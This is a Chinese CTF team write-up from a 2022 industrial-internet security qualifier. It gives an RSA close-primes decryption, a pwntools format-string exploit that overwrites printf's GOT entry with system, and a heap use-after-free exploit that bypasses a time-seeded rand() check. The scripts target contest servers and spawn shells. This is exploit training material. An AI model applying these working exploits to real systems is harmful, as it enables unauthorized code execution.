中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

WriteUp 2年前 (2022) admin
752 0 0

本次比赛我们打进决赛,为参赛师傅们点赞!中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

期待参赛师傅们线下精彩的表现。

本次成绩

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

Crypto

cry1

爆破获得p q 实现解密

from gmpy2 import *from random import *import libnum
from z3 import *
e = 101684733522589049376051051576215902510166244234370429058800153902445053536138419222096346715560283781778705047246555278271919928248836576236044123786248907522717751222608113597458768397652361813688176017155353220911686089871315647328303370846954697334521948003485878793121446614220897034652783771882675756065n = 106490064297459077911162044548396107234298314288687868971249318200714506925762583340058042587392504450330878677254698499363515259785914237880057943786202091010532603853142050802310895234445611880617572636397946757345480447391544962796834842717321639098108976593541239044249391398321435940436125823407760564233c = 92367575354201067679929326801477992215675304496512806779109227230237905402825022908214026985431756172011616861246881703226244396008088878308925377019775353026444957454196182919500667632574210469783704454438904889268692709062013797002819384105191802781841741128273810101308641357704215204494382259638905571144
# for b in range(2000):# print(b)# S = Solver()# p = Int('p')# q = Int('q')# S.add(p*q==n)# S.add(q-p==2**420+b)# tmp = str(S.check())# print(tmp)# if tmp == 'sat':# print(S.model())# break
p = 10319402322686090423885467952714173652268828534546477197386930749224489548928953868783557378771133014491657222761298355394963285810795152496594136510185639q = 10319402322686090423885467950006488404103970273239432095684700570087343967507257994593635913327166893587725950261323349433889479075061548042098460895952847
phi = (p-1)*(q-1)d = int(gmpy2.invert(e,phi))m = int(pow(c,d,n))print(libnum.n2s(m))
# m = bytes_to_long(flag)
# while True:# try:# p = getPrime(512)# q = next_prime(p+2**420)# n = p*q# phi = (p-1)*(q-1)# d = randint(0,n**0.32)# e = inverse(d,phi)# c = pow(m,e,n)# break# except:# continue
# print("e = %d"%e)# print("n = %d"%n)# print("c = %d"%c)
'''e = 101684733522589049376051051576215902510166244234370429058800153902445053536138419222096346715560283781778705047246555278271919928248836576236044123786248907522717751222608113597458768397652361813688176017155353220911686089871315647328303370846954697334521948003485878793121446614220897034652783771882675756065n = 106490064297459077911162044548396107234298314288687868971249318200714506925762583340058042587392504450330878677254698499363515259785914237880057943786202091010532603853142050802310895234445611880617572636397946757345480447391544962796834842717321639098108976593541239044249391398321435940436125823407760564233c = 92367575354201067679929326801477992215675304496512806779109227230237905402825022908214026985431756172011616861246881703226244396008088878308925377019775353026444957454196182919500667632574210469783704454438904889268692709062013797002819384105191802781841741128273810101308641357704215204494382259638905571144'''

flag值:

flag{24ceb9bc-08a5-4ba8-8ef5-231dcb049c0f}

PWN

究极输出

通过格式化字符串泄露libc基址,修改printf的git表为system,实现getshell

bss段格式化字符串漏洞。


我们首先动态调试,发现可以通过“%9$p”来泄露libc地址

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

泄露之后,算出基地址。然后利用,这两条链子来在栈中写入got的地址got+2的地址:

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

写入之后:

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

再次利用格式化字符串,修改got表的信息为system函数即可:

中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

等输入和输出结束手动输入sh,即可获得shell,然后再输入cat flag即可。

bss段格式化字符串,找两条链子,打printf的got表为system,然后手动输入sh,即可获得shell。
```PYTHONfrom pwn import *# r = process('./pwn1')r = remote("39.105.99.40",16018)e = ELF('./pwn1')libc = e.libccontext.terminal = ['tmux', 'splitw', '-h']context.log_level = 'debug'
se = lambda data :r.send(data) sa = lambda delim,data :r.sendafter(delim, data)sl = lambda data :r.sendline(data)sla = lambda delim,data :r.sendlineafter(delim, data)sea = lambda delim,data :r.sendafter(delim, data)rc = lambda numb=4096 :r.recv(numb)rl = lambda :r.recvline()ru = lambda delims :r.recvuntil(delims)uu32 = lambda data :u32(ru(data)[-4:].ljust(4, b''))uu64 = lambda data :u64(ru(data)[-6:].ljust(8, b''))info_base = lambda tag, base :r.info(tag + ': {:#x}'.format(base))leak = lambda name,base :log.success('{} = {:#x}'.format(name, base))
def dbg(cmd): gdb.attach(r,cmd)
ru(b'HELLO?PWN IT!!!n')sl(b"%9$p")
got = 0x403390
og = [0x45226,0x4527a,0xf03a4,0xf1247]libc_base = int(rc(14),16)-0x20840leak("libc_base",libc_base)sys = libc_base + libc.sym['system']offest1 = sys & 0xffff offest3 = sys & 0xffffffoffest2 = int(offest3/0x10000)shell = libc_base + og[0]pl1 = '%13200c%6$hn%4194306c%17$n' sl(pl1.encode())
leak('sys',sys)leak("shell",shell)#36 8ru(b'HELLO?PWN IT!!!n')pl2 = "%" + "{}c".format(offest2) + "%36$hhn"pl2 += "%" + "{}c".format(offest1-offest2) + "%8$hn"sl(pl2.encode())
# dbg('')
r.interactive()```

10 humidCtr

通过同时rand绕过伪随机数,通过UAF实现getshell

```#!/usr/bin/python3# -*- coding:utf-8 -*-
from pwn import *import os, struct, random, time, sys, signal, ctypes
dll = ctypes.CDLL('libc.so.6')dll.srand(dll.time())
class Shell(): def __init__(self): self.clear(arch='amd64', os='linux', log_level='debug') # self.pipe = process(['./pwn']) self.pipe = remote('47.95.8.59', 29767) def send(self, data:bytes, **params): return self.pipe.send(data, **params) def sendline(self, data:bytes, **params): return self.pipe.sendline(data, **params) def recv(self, **params): return self.pipe.recv(**params) def close(self, **params): return self.pipe.close(**params) def recvrepeat(self, timeout, **params): return self.pipe.recvrepeat(timeout, **params) def interactive(self, **params): return self.pipe.interactive(**params) def clear(self, **params): return context.clear(**params)
def recvn(self, numb, **params): result = self.pipe.recvn(numb, **params) if(len(result) != numb): raise EOFError('recvn') return result
def recvuntil(self, delims, **params): result = self.pipe.recvuntil(delims, drop=False, **params) if(not result.endswith(delims)): raise EOFError('recvuntil') return result[:-len(delims)]
def sendafter(self, delim, data, **params): self.recvuntil(delim, **params) self.send(data, **params)
def sendlineafter(self, delim, data, **params): self.recvuntil(delim, **params) self.sendline(data, **params)
def add(self, index, size, content): self.send(b'POST / HTTP/1.1rn' + p8(1) + b'&' + str(index).encode() + b'&' + str(size).encode() + b'&' + content) def delete(self, index): self.send(b'POST / HTTP/1.1rn' + p8(4) + b'&' + str(index).encode())
def show(self, index): self.send(b'POST / HTTP/1.1rn' + p8(3) + b'&' + str(index).encode())
def edit(self, index, content): self.send(b'POST / HTTP/1.1rn' + p8(2) + b'&' + str(index).encode() + b'&' + content)


sh = Shell()sh.send(b'DEV / HTTP/1.1rn' + p32(dll.rand()) + b'auth')time.sleep(1)sh.add(0, 0x26, b'a')time.sleep(1)sh.show(0)sh.recvuntil(b'The Humide Script 0 is set as ')libc_addr = u64(sh.recvn(6) + b'') - 0x1ecb61success('libc_addr: ' + hex(libc_addr))time.sleep(1)sh.add(1, 0x18, b'a')time.sleep(1)sh.add(2, 0x18, b'a')time.sleep(1)sh.add(0x10, 0x18, b'a')time.sleep(1)sh.delete(2)time.sleep(1)sh.delete(1)time.sleep(1)sh.edit(0, b'a' * 0x20 + p64(libc_addr + 0x1eee48))time.sleep(1)sh.add(2, 0x18, b'/bin/sh')time.sleep(1)sh.add(3, 0x18, p64(libc_addr + 0x52290))time.sleep(1)sh.delete(2)sh.interactive()

flag值:

flag{aee62586-92bd-4e93-9d30-0ee356e2c5e2}

文末:

欢迎各位师傅加入我们:

星盟安全团队纳新群QQ:222328705

有兴趣的师傅欢迎一起来讨论!中国工业互联网安全大赛北京市预选赛-Polaris战队 WP


原文始发于微信公众号(星盟安全):中国工业互联网安全大赛北京市预选赛-Polaris战队 WP

版权声明:admin 发表于 2022年10月23日 下午2:51。
转载请注明:中国工业互联网安全大赛北京市预选赛-Polaris战队 WP | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...